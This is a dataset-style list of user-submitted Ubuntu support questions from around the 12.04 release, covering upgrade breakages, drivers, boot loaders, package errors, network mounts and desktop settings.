129148	resume from suspend with mce remote does n't work after mythbuntu upgrade	i upgraded mythbuntu 11.10 to mythbuntu 12.04 . i had a working mce usb remote suspend/wakeup thing going for me . after the upgrade wake on usb does not work . the light on the usb ir-receiver does not flash either when trying to wake up . the computer resumes well with the power button . i have the following in my /etc/rc.local : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . sudo sh -c `` echo usb0 > /proc/acpi/wakeup '' sudo sh -c `` echo usb1 > /proc/acpi/wakeup '' sudo sh -c `` echo usb2 > /proc/acpi/wakeup '' sudo sh -c `` echo usb3 > /proc/acpi/wakeup '' sudo sh -c `` echo enabled > /sys/bus/usb/devices/3-1/power/wakeup '' exit 0 lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 0471:0815 philips ( or nxp ) ehome infrared receiver bus 003 device 003 : id 195d:7777 itron technology ione scorpius wireless keyboard cat /proc/acpi/wakeup device s-state status sysfs node p0p1 s4 *disabled pci:0000:00:1e.0 p0p4 s4 *disabled pci:0000:00:1c.0 p0p5 s4 *disabled pci:0000:00:1c.1 p0p6 s4 *disabled pci:0000:00:1c.2 p0p7 s4 *disabled p0p8 s4 *disabled p0p9 s4 *disabled usb0 s3 *enabled pci:0000:00:1d.0 usb1 s3 *enabled pci:0000:00:1d.1 usb2 s3 *enabled pci:0000:00:1d.2 usb3 s3 *enabled pci:0000:00:1d.3 eusb s3 *enabled pci:0000:00:1d.7 i have a similar problem with identical hardware on an ubuntu install . after the upgrade on that , wake on usb keyboard does n't work . what i do n't get is why it worked before the upgrade ? what has changed ?
129149	how to enable booting multiple ubuntu wubi ?	i want to use both ubuntu wubi 11.04 and ubuntu wubi 12.04 so that the boot menu will displays 3 options : windows , ubuntu 11.04 & ubuntu 12.04 . my current approach is to only use either of them , and disable the other . is there anyway to do it ?
129153	ubuntu 11.10 do n't see partition	how can i see my other partition . everything was fine and suddenlny my other partition dissapired . i booted windows and windows can see it but ubuntu ca n't . i started gparted and gparted could't see any of mine partitions .
129156	no nautilus on desktop after upgrade to 12.04	i have lost file manager functionality as well as right click on my desktop after upgrading to 12.04 . everything else in unity works fine . restarting nautilus does not work . additionally , unity launcher reacts very slowly when all windows are minimized . pc : samsung n150plus with upgraded ram ( 2gb now ) . can you help me with that ?
129163	vmware player and ubuntu 12.04 - full screen	i have installed vmware player 4.0.2 under ubuntu 12.04 ( final ) and , apart from having to patch the modules , everything went smoothly . however , there 's an irritating behavior when toggling full screen mode : toggling full screen ( using virtual machine > toggle full screen or ctrl + alt + return ) , minimizing the player and maximizing it again changes the resolution of the guest to some strange one and the player gets `` nested '' between gnome3 's taskbar as every other of ubuntu 's native windows . to switch to full screen again i have to ctrl + alt + return twice . can anyone please tell me if this is the normal , expected behavior ? is there any way of `` correcting '' it ? the host operating system is ubuntu 12.04 ( final ) and the guest is windows 7 ( both 64 bits ) .
129164	constant apport messages appearing	i have done a fresh install of ubuntu 12.04 onto my brand new dell inspiron 17r . all went fine and everything works . however , after updates and installing some programs from the software center i am almost constantly getting crash reports popping up in front of me from apport saying that there is some crash related to the gpu . i do not notice anything wrong otherwise beside the message popping up . when i follow the steps to report the error comes a window saying that i should not use that tool as it is not a development version but a stable version , so i am writing here . please point me to a forum where to report it and so on .
129165	problems using ipad and ubuntu 12.04	i have two probems using my ipad with ubuntu . the first one is that i can download music from my ipad , but not upload it . the second is that ... after the first connection , the ipad does n't appears in the computer . what should i do ? my computer is a 64 bits virtualbox vm running with 1.5 gb , inside an imac 21'5 '' late 2009 . i 'm using banshee instead of rhytmbox . my tablet is an ipad 2 32 gb wi-fi , with ios 5.0.1 .
129170	lost windows 7 when loading ubuntu	i have installed ubuntu as a dual boot with windows 7 following the step on the installation . ubuntu works fine , and windows 7 appears as an option on the boot menu , but when selected , hangs . i was concerned to see files from my windows installation appearing in a device called os in the file manager . have i lost everything ? or is there some way back ?
129177	ubuntu `` usb for os x '' instructions does n't create bootable usb drive	imac i3 running 10.6.8 i 've downloaded the 12.0.4 32-bit intel ubuntu.iso and converted it to ubuntu.img and moved to root . the `` usb for os x '' instructions say insert usb flash media . my flash media is fat32 . but , if one were to use disk utility to erase , what format is correct : fat , exfat , mac os extended ( case-sensitivity ) , or mac os extended ? found the drive : /dev/disk1 and unmounted ok . issued : sudo dd if=/ubuntu.img of=/dev/rdisk1 bs=1m the copy goes fine , but at the end i get a os x message that the disk you inserted was not readable by this computer . this is not in the ubuntu instructions . so , i choose the ignore option . issued : diskutil eject /dev/disk1 and restart with option held down . no usb drive shows up to boot from . eventually i get an `` unrecognized disk '' error . i 'm not surprised because my memory is that to get a bootable drive for a mac requires some version of the correct os x to be on the disk . yet , the folks who wrote these instructions would certainly know this fact -- yet their instructions do n't work .
129178	logging in after sleep shows desktop prior to authentication screen	on my laptop , if i close the lid ( and perhaps at other times when i 'm inactive or set the laptop to sleep manually ) , upon opening the lid , it 'll display whatever was on the screen prior to sleeping , and then after a second or so , overlay this with the authentication screen to log back in . this is on 12.04 ( 64-bit ) , but it also happened on 11.10 for me ( dell studio 1558 , 6gb ram , core i7 q720 , 1gb radeon 5400 series ) . is this a bug , or by design ? if by design , is there a way to change this ?
129180	unable to change permission of the files on mounted partitions in ubuntu 12.04 lts	i have just installed ubuntu 12.04 lts . i mounted my softs ( /dev/sda6 ) , a ntfs partition by selecting it on nautilus . after that i openend the terminal and tried to change the permissions of a file . the command executed but the file permissions remained unchanged . i tried changing the permissions by using root privileges but that did not work either .
129182	how can i duplicate my existing software packages on a new system ?	i installed 12.04 in a separate partition . right now , i would like to install the software that i have installed on my 10.04 in my 12.04 too . i was hoping there would be a workaround for this using aptoncd . but i figured out 'restoring ' using apt on cd only copies the .debs into the cache file and that might mess things up for me considerably . the rough idea that i have is : run an 'apt ' command on 10.04 that will give me all the package names that i have currently installed on my 10.04 . bring those names to 12.04 and tell apt to fetch the same softwares , but the versions of them that belong to 12.04 . install them . is there anyway to do the above steps or is there a totally different way in which i can achieve this ?
129184	unable to run unity 3d or gnome 3 after upgrade	i 've recently upgraded to precise and whenever i try and login using the default `` gnome '' or `` unity '' options , i 'm presented with either gnome classic or unity 2d ( confirmed by $ desktop_session ) . my graphics card is an ati radeon hd 5450 so i feel like it should quite happily run 3d . i 've upgraded my version of ati catalyst to the proprietary 12.4 drivers and it has n't done anything . any help would be appreciated !
129186	mysql and batch sql load	i have sql files `` separated '' like this : > tree sql sql ├── adresse_trigger_update_before.sql ├── attribut_trigger_update_before.sql ├── categorie_trigger_update_before.sql ├── duplicate_records.sql ├── horaire_trigger_update_before.sql ├── partenaire_trigger_update_before.sql ├── personne_trigger_update_before.sql └── produit_trigger_update_before.sql 0 directories , 8 files > here are all my tries : > mysql mydatabase -e `` source sql/file1.sql '' > > mysql mydatabase -e `` source sql/* '' > error at line 1 : failed to open file 'sql/* ' , error : 2 > cat sql/* > mysql mydatabase > cat : option invalid -- 'p' > mysql mydatabase -e `` source sql/* '' > bash : sql/* : ambiguous redirect how to load many files at once in mysql ? nota : there 's only one problem i 'm facing : load all the files in the `` sql '' folder at once . no other problem ( i 've removed user and password to be more precise about the actual problem ) . any idea how to do this ?
129193	configuring .desktop launcher ( switcher problem )	i am trying to write *.desktop launchers for 2 applications ( aptana and dart editor ) . i have the same problem with both of them . when i click on the icon , they launch properly but neither are they in unity sidebar nor alt+tab . i just minimized one and ca n't open it again : d it 's simply gone ! but working . here is what i have in aptana.desktop : [ desktop entry ] version=1.0 type=application terminal=false startupnotify=true icon [ en_us ] =/opt/aptanastudio3/icon.xpm name [ en_us ] =aptana studio 3 exec=env ubuntu_menuproxy=0 /opt/aptanastudio3/aptanastudio3 -application com.aptana.commandline.launcher.launcherapplication `` $ @ '' > /dev/null 2 > & 1 & name=aptana studio 3 icon=/opt/aptanastudio3/icon.xpm can anyone spot the problem ? the reason i do n't just drag & drop the executable is because both , aptana and dart editor , are just tweaked versions of eclipse . if i did that , i would be able to launch application but then a second icon in the launcher would appear for editor 's running instance .
129196	maas node install shutdown error when installing from cd-rom	i am trying out the new maas tool on my laptop and have installed the maas server in a virtualbox vm . since the pxe boot option is not working for me in a virtualized enviornment i tried to install a node with the cd-rom option instead . i select the option `` multiple server install with maas '' then it proceeds up to the option of entering the ip address of the maas server . i have maas already installed on another vm and provide the ip address of the maas server . the problem is that immediately after the node shuts down without completing the install process . i tried to look in the maas server and the node is not registered there either . any ideas ?
129197	moving from 12.04 beta to 12.04 final , now i have 12.10 ?	i installed the 12.04 beta some time ago . after the final version was released , i consulted `` the internet '' , which told me ( here ) that i do not need to do anything , i 'll have 12.04 final at the time it is released . however , now it seems i have 12.10 development version installed , at least that 's what lsb_release -a tells me ... i 'm wondering what 's the correct procedure to go from beta to final , and what can i do now to go back to 12.04 final without a complete reinstall ? thanks ! edit : $ cat /etc/issue ubuntu quantal ( development branch ) \n \l
129204	unable to boot from hard drive after upgrade to 12.04. error : symbol 'grub_xpuls ' not found	i just upgraded from lucid to 12.04 , and now i ca n't boot from my hard drive , but get the following error message : the symbol 'grub-xpuls ' not found ... and then it wants me to do something to grub rescue , and me being no expert , i have no idea what that might be . help please ? i wish i could be more specific and less of a noob , but sadly ...
129206	automatic conversion of decimal number	i have this number 0.057287 , if i write it in oocalc , will be converted in 954.47.00 . the only way to leave it as it was is to write '0.057287 , but this last notation hide number from the charts . how can i turns off this issue ?
129207	screen goes blank/corrupted/garbled when pressed brightness buttons on dell inspiron 14r in 13.04	when i press brightness key little faster the screen turns black ( when graphic driver is not installed ) or corrupted ( when ati driver is used ) and i have to forcefully restart again.this happens even with software brightness settings.i have to reduce brightness because brightness is set to maximum every time i logout/restart . note : i always use my laptop with ac adapter update : i have removed 12.04 and installed 13.04 and i faced same problem , i added `` acpi_backlight=vendor '' option and the brightness across the the sessions is saved . but the screen is still becoming garbled and forcing me to restart again , here is the snapshot of my laptop screen . update : i have installed manjaro linux , to test for this problem , i have faced the same problem again . seems like this a kernel level problem . ( i am pretty much screwed with any linux distro ) . does anyone know a kernel , which does not have this problem . i will start testing out kernels from today . i have tested many kernels in ubuntu , manjaro , crunchbang . for me the only kernel which does not replicate the problem is 3.11.0 . you can get the kernel from here . if anyone is facing the same problem and any other kernel is working , please share .
129208	the dual-monitor settings ignored when using xfce	i have two monitors and a ati radeon 5750 video adapter . using ati 's catalyst control center i am able to configure the displays so that the desktop spans over the two monitors . the multi-desktop settings are preserved when logging with kde . it was also working properly with gnome and unity ( when i used to have them installed ) . but : when logging in with xfce the second monitor is cloning the first ( instead of creating an extended desktop ) . i can enter into ati 's control center and reconfigure the desktop . but the settings are lost when i logoff ! does anyone have any clue about what is happening here ? why does the xfce desktop uses some wrong multi-monitor settings ? this problem appeared first when i upgraded to 11.10 ( about 2 months ago ) . and now after upgrading to 12.04 the problem persists .
129217	gnome3 not displayed correctly	i 'm sure this question has been asked before , but i ca n't seem to locate it on this website , so here goes . my gnome3 does not look like it should . when i first installed gnome-shell , it worked , but after rebooting once , the interface looks like the classic gnome interface . i 'm looking for an answer to why this behavior exists and how to fix it . note that i had this problem before , and i was able to ( accidentally ) get it to work in ubuntu 11.10 , so it 's not likely to be a hardware error . i 'm running ubuntu 12.04 32-bit on a hp pavilion dv6 . my settings > details > graphics reads `` driver : unknown , environment : fallback '' result of gnome-shell -- replace that does display the gnome3 bar at the top , along with the super key functionality , but the windows go all flashy and it 's hard to navigate between windows . this is the output in the terminal . gnome-shell -- replace agent registration failed : already exists warning of window manager : log level 16 : unable to register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject waarschuwing van vensterbeheer : log level 16 : error registering polkit authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject ( polkit-error-quark 0 ) ( gnome-shell:4549 ) : folks-warning ** : failed to find primary personastore with type id 'eds ' and id 'system ' . individuals will not be linked properly and creating new links between personas will not work . the configured primary personastore 's backend may not be installed . if you are unsure , check with your distribution .
129218	how to return the login screen to the default	i 've been experimenting with various desktop environments , including lxde , xfce , kde . i 'm returning to unity , and i would like my login screen back to the default for 12.04 . i think that it changed when i tried kde , probably because of an answer i gave to a prompt that i did n't understand . any ideas ?
129227	how do i install intel hd graphics driver on ubuntu 12.04 ?	how do i install intel hd graphics driver on ubuntu 12.04 ? i 'm a beginner ubuntu user , so i could not install drivers .
129236	is wake up from standby possible via script or schedule ?	is it possible to cause ubuntu to resume from standby or sleep mode to run a scheduled task like at job/crontab ? ( hibernation seems to be ruled out in another question ) can a script be written that : standby ( to cycle power to devices with buggy drivers , for example ) sleeps n seconds wakes up and continues . ( restarts network-manager if necessary ) this is not a `` wake-on-lan '' problem . the event is purely internal and connected via wifi only anyway .
129240	why is nautilus listing so slow when showing thumbnails ?	i have a folder with thousands of photo on it . every time i enter the folder ( even in the same gnome session ) nautilus start showing the icons ( thumbnails ) for that folder but the listing is very slow . furthermore , the window 's vertical bar , moves and shriks as the list grows , so every time i have to wait for the list to finish before i can comfortably scroll up and down my pictures . why does this happen ? note : it is not a matter of thumbnails rebuild since if i scroll down the bar last images icons are displayed properly .
129241	minecraft goes black on 12.04	upon upgrading to 12.04 i installed minecraft , openjdk 6 and 7 . when i login everything is fine , but after that i get the `` updating minecraft '' screen for about 0-5 seconds , then the screen goes black . i waited for about 5 minutes and eventually mc crashed and an error report came up . minecraft : minecraft 1.2.5 os : linux ( i386 ) version 3.2.1-24-generic-pae java:1.6.0_24 , sun microsystems inc. vm : openjdk server vm ( mixed mode ) , sun microsystems inc. lwjgj : 2.4.2 [ failed to get system properties ( java.lang.nullpointerexception ) ] org.lwjgl.lwjglexception : coulod not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo . ( linuxdisplaypeerinfo.java:52 ) there 's some more to the report , tell me if you want me to continue , i have to type all this by hand because i ca n't copy paste the error report . the rest of the lines are a bunch of at blah.blahblah.blah .
129242	disabling drum beat login sound on precise 12.04 with gnome-shell	yes i know this is an old chestnut , but i ca n't find a solution for my case . i want to disable the drum-beat logon screen sound , but i ca n't use the standard recipe of system > preferences > startup applications > logon sound because i 'm using gnome-shell and there is n't a system preferences menu . so : if i did make the change as specified for unity , what config file ( s ) would be changed on disk ? if i know that , i can make the change myself . the trouble with answers that just say `` pull up this menu and untick this box '' is that i ca n't tell what 's actually going on under the hood .
129246	after 12.04 upgrade : ca n't log in although password is correct	i upgraded from 10.10 to 12.04 , and now ca n't log in any more . the password is correct- when i type in a wrong one , i am told it 's incorrect , while the correct one is seemingly accepted , but then just takes me back to the login page . i can login as guest , but i ca n't do anything with the shell as it , too , does n't accept my password .
129254	need usb drive to boot aspire one into ubuntu	i just installed 12.04 lts onto my acer aspire one from a usb thumbdrive , and i can not reboot unless i boot from the usb drive . if i have the usb drive plugged in , it boots , and it looks like the system is running of the hdd ( / is mounted from there , the usb drive is /media/pendrive , everything works fine when i unmount it , etc ) . if i reboot with no usb drive mounted , i just get a flashing cursor . it looks like a misconfigured boot loader . the terminal tells me that grub is not installed ... so just how does ubuntu boot these days , and how can i make the hdd bootable ?
129259	upgrade from 11.10 to 12.04 using installation cd ?	i do not have internet access but have downloaded the desktop iso and the alternate iso . can i do an upgrade using these , or do i have to install a new complete version replacing the old version ?
129265	nx session window icon shrinks and is non-responsive , but remote session still active	this is a tough problem to summarise in one line ! steps to re-produce : from ubuntu unity desktop ( i 've experienced this is 11.10 and 12.04 ) , start an nx session with a remote server [ do something in remote session ( full screen ) ] in remote session , minimise the window ( i do this by clicking in top-right corner/hotspot ) [ do something in local desktop for a bit ] , note grey ' ? ' window icon for nx session in unity task panel try to go back to remote session ( goto 2 ) . if you ca n't click remote session 's icon in task panel , try alt+tab now , on some occasions it will be no problem ( seems that it always works first time , but not subsequently ) , and the window of the remote session will spring back into life . on other occasions there is only a tiny grey rectangle about 5 x 20 pixels that appears but does n't allow me to re-activate the nx window . if this happens i need to go back to the menu and go through the steps to start a new session ( thankfully however once it connects i am returned to the existing session ) . here is a screenshot showing the grey rectangle , and you can also see the grey ' ? ' icon in the task panel , with a pop-up title of 'hud ' . http : //i.stack.imgur.com/8y5xy.jpg update : i 've now installed gnome-shell , and i get the same problem with that . first switch works well , but second one fails and i get the little grey rectangle .
129269	can not add repository due to `` could n't connect to host '' error	i am unable to add repositories in my ubuntu 12.04 . i am getting an error whenever i try to add repository.following is the error i am getting : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) please help me out with this ,
129282	nvidia 9800 gtx+ x11 fails to initialize . no unity or lightdm	i have just upgraded my work pc to 12.04 ( not upgrade , fresh install ) , installing updates during the install , and after everything has loaded ( with no errors ) and i restart i get brought to console 1 tty login . console 7 looks like this : iirc i did not have to finagle with my drivers on 11.10 to get this card working . if this is in fact a driver bug i will remove this post and submit the bug but i 'm not 100 % confident that it is . i attempted to run unity -- reset and got this : lastly i tried $ sudo apt-get install nvidia-current which tells me nvidia-current is already the newest version . so i ran $ sudo dpkg-reconfigure nvidia-current which says /usr/sbin/dpkg-reconfigure : nvidia-current is broken or not fully installed . anything i can try from here would be awesome . currently the only way to get the system up and running was to shut down , plug one of my monitors into the onboard video , enable the onboard video card from the bios , then boot back up ( and on my single monitor everything is fine ) . update so i have been able to boot fresh with the ext card plugged in as long as i do n't take the updates with the install . past this if i only install the nvidia drivers ( nvidia-current or nvidia-current-updates ) from the main server ( or canadian ) i then get the problems.. my proposal ; which i do n't know where to look for : can i try installing the previous version of this driver ? in the past , on another machine i had issues with my nic driver being funky ... downgraded to the previous driver and bam everything was merry and well .
129284	connection problems with 3g dongle ( vodafone k3805-z )	in my newly-installed ubuntu 12.04 lts , my zte k3805-z vodafone-branded usb 3g dongle shows in the notification area as a 'mobile broadband ' connection called 'vodafone contract ' . so far , so good ! ... but i can not access the internet . i receive the error 'problem loading page - server not found ' . firefox works with a wired connection and the dongle works under windows vista ( which i detest ! ) . if someone out there can fix this , i promise to delete windows vista !
129287	smbfs/cifs wo n't mount	this fstab has worked for 4 ubuntu versions . all of the sudden , it does n't work after a reboot , but i had it working under 12.04 yesterday . it still works on another 12.04 machine with no problems . smbfs is installed . run sudo mount -a and it just sits there and thinks . //hda/music /home/ag/music cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0 //hda/pictures /home/ag/pictures cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0 //hda/movies /home/ag/videos cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0 //hda/docs /home/ag/documents/shared cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0 //hda/torrents /home/ag/torrents cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0 //hda/private /home/ag/private cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0 //hda/books /home/ag/books cifs credentials=/root/.smbcredentials , iocharset=utf8 , noserverino , gid=1000 , uid=1000 , nounix , file_mode=0777 , dir_mode=0777 0 0
129288	manual shortcut keys without using settings	i want to change the `` close window '' shortcut to ctrl+q as this is more intuitive to me than the default alt+f4 . prior to 12.04 upgrade , i was just able to change this via the settings window , but in 12.04 when i try to set it as ctrl+q by pressing the keys for the settings manager to capture , it just closes the window and does n't set the shortcut . i have had a look through gconf-editor , but ca n't seem to find anything . is there any way to manually set the shortcut key ? thanks
129289	unity , seeing all instances of same open application windows on all virtual desktop	i noticed this strange issue with unity . i am using 12.04 . the desktop has 4 virtual desktops , which i can switch between using the 'workspace switcher ' which is very nice . but i noticed the following : when i have 2 instances of the same app ( say 2 different firefox windows , or 2 different terminal windows ) , in 2 different virtual desktops , then i click on the icon for that application located on the launcher panel ( the left long strip with icons on it ) , then i see the application comes into focus . then when i click again right away ( on the same icon on the launcher ) , then now all instances of this application that are open come into one view ( may be on was on desktop 1 , and the other was on desktop 3 for example ) and then i can now click on the one instance window that i want to select to use . this is all very nice actually . but this does not work for all applications ! i just tried it , and it worked for firefox , and for gedit and for the gnome terminal . i have one firefox window open in virtual desktop 1 , and another window open in virtual desktop 2 . i clicked once on the firefox icon , then again , and both windows came into the main desktop and i was able to select which one to use . when i tried the same thing on dolphin file manager , which i also had 2 windows ( instances ) of it open in 2 different virtual desktops , this behavior did not happen . i clicked again , and nothing happened . only one remained in focus . so i had to fo look for the second dolphin window the hard way . it looks like some apps are supported by this feature and some are not . how does one make it so that all applications are supported like this ? this is a very handy feature . is it a configuration item somewhere ? thanks
129292	`` 'glibc_2.14 ' not found '' error after upgrade	good moring , i attempted to upgrade from 11.10 to 12.04 . after reboot i get a black screen with the following message : mountall : /lib/x86_64-linux-gnu/libc.so.6 : version 'glibc_2.14 ' not found ( required by /lib/libply.so.2 ) general error mounting filesystems a maintenace shell will now be started any assistance would be greatly appreciated . thanks .
129295	how to work around hp printer cartridge expiry ?	in 11.04 version of ubuntu my printer worked fine with expired cartridges . it seems that the new 12.04 lts version contains some driver changes as now the printer stops with `` cartridge error '' signs for the expired cartridges . do you know how to configure / change the driver to avoid this ? i need only black and white printing .
129297	wireless does n't work reliably on an acer aspire 8930 with an intel wifi link 5100	2 days ago i 've upgraded my ubuntu to 12.04 . it 's running dual boot with windows 7 on an acer aspire 8930 which has a intel wifi link 5100 . i now have wifi problems where it constantly switches on and off and has e really weak signal . could anybody help .
129298	how do i change the super-alt-rightclick combination for the panel edit menu in gnome classic ?	i can use super-alt-rightclick on the gnome panel in gnome classic ( ubuntu 12.04 ) and this gives the edit menu ( add to panel , properties , etc ... ) . how can i change this ? i would like to either change it to just rightclick , or remove the super and make is alt-rightclick . thanks
129305	how can i open binary android rom image files ? ( .img )	i 'm a windows/mac/ubuntu and android user , so i know what i 'm talking about , when i say : how do i open binary image files ? ( .img ) they just wo n't open , on any os… i 'm an android dev… i 'm currently working on a rom , ( i also program , using windows ) but i need to extract files , from .img files . i 've converted them to .ext4.img but they just are n't recognized by linux ( definitly not by android ) , by mac os or windows . in other words , i ca n't open , extract or mount them . can anyone help me ? i 'm kinda confused…
129307	mysql package problem after update	i recently installed the newest version of ubuntu ( 12.04 lts 32 bit ) . afterward , i opened up update manager and got the following error : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : the package mysql-server-5.5 needs to be reinstalled , but i ca n't find an archive for it . ' i do n't use mysql-server , and i do n't know how to fix this . after i get this error , package manager closes leaving me unable to update anything . update manager : apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done e : the package mysql-server-5.5 needs to be reinstalled , but i ca n't find an archive for it . @ rinzwind : i tried sudo rm /var/lib/apt/lists/* -vf /var/lib/apt/lists/ directory emptied sudo apt-get update worked , and populated the folder update manager still has the same problem
129321	why does lightdm only show a custom wallpaper on the login screen if i have selected one of the default wallpapers ?	lightdm only changes wallpapers if i have selected one of the default wallpapers . if i choose another image from my pictures , lightdm shows the default wallpaper . why is this happening , and how can i make lightdm show my wallpaper if it is not one of the defaults ? as @ doug said in his answer , it works if you click on the little + symbol in the appearance settings : after you do that , lightdm changes wallpapers .
129322	how to install a driver for an nvidia card not detected by additional drivers ?	for the past few days i 've been trying to get compiz working on ubuntu 12.04 with my nvidia graphics card - geforce gt550m , but i could n't get it to work . i 've been searched for tips and tricks on how to do it but nothing has worked so far . this is the last one i tried - http : //www.howtoforge.com/enabling-compiz-fusion-on-ubuntu-11.10-oneiric-ocelot . it appears to be pretty easy but whenever i open the additional drivers tool , it says `` no proprietary drivers are in use on this system '' . all the tutorials i have found include this step so none of them have worked . i would really like to use compiz effects but i do n't know what to try any more , so i could really use some help . thanks in advance !
129334	setting up an internal pastebin server	i 'd like to set up an internal pastebin server . are there any ubuntu packages / docs for setting up pastebin as a server on ubuntu ?
129336	how can i reassign the < alt > -space keybinding ?	i use alt+space shortcut for synapse . i have reassigned the activate windows menu from alt+space but can not still receive an error failed to register hotkey 'activate ' with signature 'space'
129339	how to remember currently running applications in 12.04 ?	i can not find the option `` remember currently running applications '' in 12.04 whereas in 10.04 , it was along with startup applications . any idea where i can find it ? update : as you can see from the comments , this feature has been removed . so as an answer , i 'd like to know if there is a workaround to this . so the question remains the same , but instead of searching for the in-built option , i now seek a workaround .
129342	where is libpython-dev ?	i 've just upgraded to 12.04 and i ca n't find libpython-dev anymore . can you tell me where it is ?
129345	using rtl languages with ms office in wine 1.4	i 've installed ms office 2007 in ubuntu 12.04 using wine 1.4 with no problems , and it works fine with the english language . however , i need to use it to work with arabic and hebrew , and it does n't work when i switch to a hebrew or arabic keyboard . the typing gets reversed . i saw an earlier post for something similar , but it is closed and i think it was for the earlier wine 1.3 . supposedly wine 1.4 has added rtl -- is there a way to get it working ?
129348	installazione jre 1.5.0.16 / install jre 1.5.0.16	premesso che sono un nuovo utilizzatore di ubuntu ( 12.04 ) vorrei sapere come si fa ad installare java jre 1.5.0.16 che ă¨ indispensabile per utilizzare i programmi fiscali dell'agenzia delle entrate . ho fatto il download dal sito oracle ed ora mi trovo nella cartella `` scaricati '' il file jre-1_5_0_16-linux-i586.bin ma non so come fare per installarlo . grazie per la risposta . google translate . i am a new user of ubuntu ( 12.04 ) i would like to know how do i install the java jre 1.5.0.16 which is essential to use the tax revenue agency programs . i did download from the oracle site and now i am in a folder `` downloads '' file jre-1_5_0_16-linux-i586.bin but i do not know how to install it . thanks for the reply .
129349	bad bengali font ?	i just installed precise in my native language ( bengali ) . i 'd post an image , but apparently new users ca n't post images on this forum . the bengali font is oddly small and difficult to read . i do n't want to increase font size from the accessibility settings since that makes the english fonts larger too , everything takes up more space , and it just looks bad . is there a way to replace the bengali font with something else , or at least increase it 's size ?
129351	how do i delete files from the ubuntu one server	my system has crashed and i have had to rebuild it from local data backup storage . i ca n't seem to re link my folders to u1 so want to clear the data on the servers so i can start over . obviously the original sources are no longer . can i clear the account or do i start a new one with an alternate email addy ? matt
129352	ubuntu 12.04 freeze after few seconds in hp touchsmart 520	i have not one but two desktop pc 's ( hp touchsmart 520 ) . i have been used ubuntu since a long time ago , but something weird happened after upgraded to 12.04 . tne installation process was ok , but when i turn my computer on , after few seconds it ( they ) freezes and so i have to shut it down . any idea ?
129354	canot resolve package dependencies	ive fresh installed ubuntu 12.04 and wanted to look for updates . an error occurred and asked if i want to repair dependencies . so i did what it asked for but it failed again and again and again . same thing happens when i want to install software from repositories `` sudo apt-get install ... '' . ive read that it can be solved by installing missing dependencies by `` sudo apt-get install -f '' . but it failed with error again : errors were encountered while processing : /var/cache/apt/archives/libqtcore4_4 % 3a4.8.1-0ubuntu4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any suggestions what to do ? sudo dpkg -- configure -a gave me : errors were encountered while processing : libqtgui4 : i386 libqt4-sql : i386 ia32-libs-multiarch : i386 libqt4-declarative : i386 libqt4-svg : i386 libqt4-network : i386 libqt4-sql-mysql : i386 libqt4-script : i386 libqt4-dbus : i386 ia32-libs libqt4-opengl : i386 libqtwebkit4 : i386 libqt4-designer : i386 libqt4-scripttools : i386 libqt4-qt3support : i386 libqt4-xml : i386 libqt4-test : i386 libqt4-xmlpatterns : i386 ive done : sudo apt-get clean sudo apt-get autoclean sudo apt-get install -f still getting this error : errors were encountered while processing : /var/cache/apt/archives/libqtcore4_4 % 3a4.8.1-0ubuntu4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
129366	shutdown in specific way , if no-one uses computer	i have problem because my friends with i live often forget to shut down our computer . i do n't know how solution use to pretend it . there is ubuntu system installed . i am looking for solution that user will be force to click and confirm ( once a hour ) that someone uses computer . if he does n't it computer automatically should do shutdown . is there any solution for this problem ?
129370	upgraded ubuntu 12.04 ui freeze	i 've seen a link between my ui freezing and flash running on my browser . is there anything to fix this ? currently i 'm avoiding this by using chrome which is n't loading flash b/c the plugin is out of date . everything seems to be fine , but if i were to load up a page with flash ... ui crash . when this does happen my workaround is to ctrl+alt+f1 , log in , kill firefox and flash , and ctrl+alt+f7 back to the gui . the other workaround is to use 2d , but that drives me nuts . i 'm running 64 bit desktop upgraded to 11.10 from 12.04 with nvidia current driver installed .
129371	how can i set the threshold cursor velocity for passing through the ubuntu menu bar ?	i am running with dual monitors ( left and right ) via ati catalyst display manager , not xinerama . both monitors have a vertical ubuntu menu bar on the left . i probably do not need each monitor to have one because it is a waste of space but i will live with it for the time being . as a feature , the cursor will not `` easily '' pass through the ubuntu menu bar when going from the left to the right monitor and vice versa . it will pass through only if the cursor is traveling at a high velocity . can i lower the threshold velocity and how ?
